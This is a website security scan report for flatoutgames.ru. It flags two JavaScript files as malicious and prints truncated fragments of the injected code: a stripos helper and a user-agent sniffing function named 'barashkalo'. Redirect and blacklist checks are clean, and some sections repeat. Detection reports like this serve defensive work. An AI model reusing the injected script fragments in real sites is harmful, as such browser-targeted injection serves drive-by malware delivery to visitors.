Scanned pages/files
Request | Server response | Status |
http://flatoutgames.ru/ | 200 OK Content-Length: 13848 Content-Type: text/html | clean |
http://flatoutgames.ru/flashobject.js | 200 OK Content-Length: 18780 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1 var oldBeforeUnload=window.onbeforeunload; window.onbeforeunload=function(){ deconcept.SWFObjectUtil.prepUnload(); oldBeforeUnload();}; }else{window.onbeforeunload=deconcept.SWFObjectUtil.prepUnload;} if(Array.prototype.push==null){ Array.prototype.push=function(_31){ this[this.length]=_31; return this.length;};} var getQueryParamValue=deconcept.util.getRequestParameter; var FlashObject=deconcept.SWFObject; var SWFObject=deconcept.SWFObject; Antivirus reports:
| ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21412 Content-Type: text/javascript | clean |
http://flatoutgames.ru/index.php | 200 OK Content-Length: 13201 Content-Type: text/html | clean |
http://flatoutgames.ru/track.php | 200 OK Content-Length: 17119 Content-Type: text/html | clean |
http://flatoutgames.ru/music.php | 200 OK Content-Length: 34855 Content-Type: text/html | clean |
http://flatoutgames.ru/car.php | 200 OK Content-Length: 20118 Content-Type: text/html | clean |
http://flatoutgames.ru/contacts.php | 200 OK Content-Length: 10781 Content-Type: text/html | clean |
http://flatoutgames.ru/jquery.min.js | 200 OK Content-Length: 5855 Content-Type: application/x-javascript | clean |
http://flatoutgames.ru/jquery.validate.pack.js | 200 OK Content-Length: 26206 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1 Antivirus reports:
| ||
http://flatoutgames.ru/view_info.php?cat=1 | 200 OK Content-Length: 12727 Content-Type: text/html | clean |
http://flatoutgames.ru/view_info.php?cat=2 | 200 OK Content-Length: 11400 Content-Type: text/html | clean |
http://flatoutgames.ru/view_car.php?cat=6 | 200 OK Content-Length: 11642 Content-Type: text/html | clean |
http://flatoutgames.ru/view_car.php?cat=7 | 200 OK Content-Length: 13011 Content-Type: text/html | clean |
http://flatoutgames.ru/view_car.php?cat=8 | 200 OK Content-Length: 13763 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: flatoutgames.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Sep 2014 23:33:23 GMT
Server: nginx/1.2.4
Content-Type: text/html
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: flatoutgames.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Sep 2014 23:33:23 GMT
Server: nginx/1.2.4
Content-Type: text/html
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: flatoutgames.ru
Referer: http://www.google.com/search?q=flatoutgames.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: flatoutgames.ru
Referer: http://www.google.com/search?q=flatoutgames.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=flatoutgames.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://flatoutgames.ru/
Result: flatoutgames.ru is not infected or malware details are not published yet.
Result: flatoutgames.ru is not infected or malware details are not published yet.